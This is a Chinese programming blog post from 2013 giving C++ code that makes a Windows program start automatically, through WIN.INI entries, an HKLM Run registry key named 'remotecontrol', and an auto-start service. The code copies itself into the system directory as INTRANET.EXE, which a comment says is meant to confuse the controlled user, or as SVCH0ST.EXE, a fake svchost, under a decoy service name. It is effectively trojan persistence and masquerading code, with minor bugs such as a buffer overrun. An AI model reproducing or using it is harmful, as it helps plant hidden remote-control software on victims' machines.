现在的位置: 首页 > 自动控制 > 工业·编程 > 正文

C++实现程序开机自启动

2013-02-07 22:53 工业·编程 ⁄ 共 4597字 ⁄ 字号 暂无评论

可以采用以下方式实现自启动:
//拷贝到系统目录
TCHAR TempPath[MAX_PATH];
CString temp;

::GetSystemDirectory(TempPath ,MAX_PATH);
temp = TempPath;
temp = temp + _T("\\INTRANET.EXE");
int len = temp.GetLength();
LPBYTE lpb = new BYTE[len];
for(int j = 0; j < len; j++)
{
    lpb[j] = temp[j];
}
lpb[j] = 0;
//把本程序拷贝到系统目录下,并改名为intranet.exe,这样做的目的是为了迷惑被控制端用户
CopyFile("autoboot.exe", temp ,FALSE);

1.修改WIN.INI(C:\WINDOWS\WIN.INI)文件:

WritePrivateProfileString(_T("windows"), _T("load"), temp, _T("c:\\windows\\win.ini"));
WritePrivateProfileString(_T("windows"), _T("run"), temp, _T("c:\\windows\\win.ini"));

2.采用加载注册表方式启动:
HKEY hKey;
LPCTSTR data_Set="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey));

if(ret0 != ERROR_SUCCESS)
{
    MessageBox("错误0");
}
long ret1=(::RegSetValueEx(hKey,_T("remotecontrol"),NULL,REG_SZ,lpb,len));
if(ret1!=ERROR_SUCCESS)
{//判断系统的相关注册是否成功
   MessageBox("错误1");
}
//关闭注册表中的相应的项
::RegCloseKey(hKey);

3.注册为系统服务:
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);   //服务主函数
void WINAPI CmdStart(void);     //要启动的程序函数
void WINAPI ServiceCtrlHandler(DWORD Opcode);      //服务控制函数
BOOL InstallService();   //安装服务的函数
BOOL DeleteService();   //删除服务的函数

在main函数中执行下列:
SERVICE_TABLE_ENTRY  DispatchTable[]={{SERVR_NAME,ServiceMain},{NULL,NULL}};  //最后的NULL指明数组的结束                                   
StartServiceCtrlDispatcher(DispatchTable);
InstallService();  //安装服务

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
    m_ServiceStatus.dwServiceType = SERVICE_WIN32;
    m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
    m_ServiceStatus.dwWin32ExitCode = 0;
    m_ServiceStatus.dwServiceSpecificExitCode = 0;
    m_ServiceStatus.dwCheckPoint = 0;
    m_ServiceStatus.dwWaitHint = 0;
    m_ServiceStatusHandle = RegisterServiceCtrlHandler(SERVR_NAME,ServiceCtrlHandler);
    if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
        return;
    m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;                     //设置服务状态
    m_ServiceStatus.dwCheckPoint = 0;
    m_ServiceStatus.dwWaitHint = 0;
    //SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。
    //所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置
    SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
    bRunning=true;
    //*
    CmdStart();                             //启动我们的服务程序
    //*
    return;
}

void WINAPI ServiceCtrlHandler(DWORD Opcode)                    //服务控制函数
{
    switch(Opcode)
    {
    case SERVICE_CONTROL_PAUSE:   
        m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE: 
        m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:  
        m_ServiceStatus.dwWin32ExitCode = 0;
        m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        m_ServiceStatus.dwCheckPoint = 0;
        m_ServiceStatus.dwWaitHint = 0;
        SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
        bRunning=false;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;
    }
    return;
}
BOOL InstallService()                           //安装服务函数
{
    char strDir[1024];
    SC_HANDLE schSCManager,schService;
    GetCurrentDirectory(1024,strDir);
    GetModuleFileName(NULL,strDir,sizeof(strDir));
   
    char chSysPath[1024];
    GetSystemDirectory(chSysPath,sizeof(chSysPath));
   
    strcat(chSysPath,"\\SVCH0ST.EXE");
    if(!CopyFile(strDir,chSysPath,FALSE))
        return FALSE;                    // 把我们的服务程序复制到系统根目录
   
    strcpy(strDir,chSysPath);
    schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
    if (schSCManager == NULL)
        return false;
   
    LPCTSTR lpszBinaryPathName=strDir;
   
    schService = CreateService(schSCManager,SERVR_NAME,"Windows File Manage.", //将服务的信息添加到SCM的数据库
        SERVICE_ALL_ACCESS,
        SERVICE_WIN32_OWN_PROCESS, // 服务类型
        SERVICE_AUTO_START, // 启动类型
        SERVICE_ERROR_NORMAL, 
        lpszBinaryPathName, // 服务名
        NULL,
        NULL,
        NULL,
        NULL,
        NULL);
   
    if (schService == NULL)
        return false;
   
    if(!StartService(schService,NULL,NULL))   //启动服务
        return FALSE;
   
    CloseServiceHandle(schService);
    return true;
}

BOOL DeleteService()
{
    SC_HANDLE schSCManager;
    SC_HANDLE hService;
    schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
   
    char chSysPath[1024];
    GetSystemDirectory(chSysPath,sizeof(chSysPath));
    strcat(chSysPath,"\\SVCH0ST.EXE");
   
    if (schSCManager == NULL)
        return false;
   
    hService=OpenService(schSCManager,SERVR_NAME,SERVICE_ALL_ACCESS);
    if (hService == NULL)
        return false;
   
    if(DeleteFile(chSysPath)==0)          
        return false;
   
    if(DeleteService(hService)==0)
        return false;
   
    if(CloseServiceHandle(hService)==0)
        return false;
    else
        return true;

    return TRUE;
}

void WINAPI CmdStart(void)
{
    //.....我们的程序代码
}

给我留言

留言无头像?